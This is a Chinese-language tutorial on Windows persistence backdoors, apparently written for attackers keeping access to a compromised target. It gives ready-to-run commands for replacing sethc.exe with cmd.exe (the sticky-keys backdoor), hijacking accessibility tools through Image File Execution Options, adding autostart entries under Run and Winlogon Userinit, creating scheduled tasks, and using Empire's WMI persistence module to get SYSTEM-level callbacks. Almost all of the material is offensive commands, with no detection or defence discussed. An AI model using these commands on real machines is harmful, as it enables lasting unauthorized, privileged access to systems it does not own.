粘滯鍵后門

在windows上連續按5次“Shift”，就可以調出粘滯鍵。

方法一：
將C:\Windows\System32目錄下的sethc.exe替換

如果目標機是 winvista 以上的，即 winvista 以后出的系統，修改 sethc 會提示需要 trustedinstaller 權限，所以想要繼續，那就需要修改所有者為Administrator，并修改其權限：

修改完成后以管理員身份運行執行命令：

cd windows\system32
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe

然后連續按5次“Shift”，就會彈出cmd框

方法二：
修改注冊表，利用鏡像劫持。鏡像劫持可以理解為當你打開a.exe程序實際打開的卻是b.exe程序，那么a程序就是被b程序劫持了。

執行如下命令：

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\calc.exe"

在 ‘ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Image File Execution Options ’中添加sethc.exe記錄，在鍵值Debugger中設置我們要替換的程序，即可完成鏡像劫持。
然后連續按5次“Shift”，就會彈出計算器

其他同理程序:
C:\Windows\System32\utilman.exe 設置中心 快捷鍵：Windows+U 鍵
C:\Windows\System32\osk.exe 屏幕鍵盤
C:\Windows\System32\Magnify.exe 放大鏡 快捷鍵：Windows+加減號

注冊表自啟動

通過修改注冊表來讓程序自啟動

注冊表位置一：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

執行如下命令添加啟動項：

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\windows\system32\calc.exe"

完成后當開機時自動啟動calc.exe

注冊表位置二：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的鍵值Userinit

將鍵值修改為C:\Windows\system32\userinit.exe,cmd.exe
重新登錄用戶，發現登錄自啟動cmd.exe

計劃任務后門

命令:schtasks /Create /tn Updater /tr notepad.exe /sc hourly /mo 1
以上的命令會在每小時執行一次notepad.exe，在win7及以下的系統使用at命令代替schtasks

WMI后門

WMI后門有兩個特征：無文件和無進程。相對于以上的方法，它難以排查，而且也比較容易繞過限制
當我們使用empire獲得了一臺主機的控制權后，可以使用empire的wmi模塊留下后門：
在empire使用模塊：usemodule persistence/elevated/wmi

設置好Listener參數：set Listener xxxx，執行run

重啟靶機，靶機會在五分鐘內重新連接回來，并且連接時就是system權限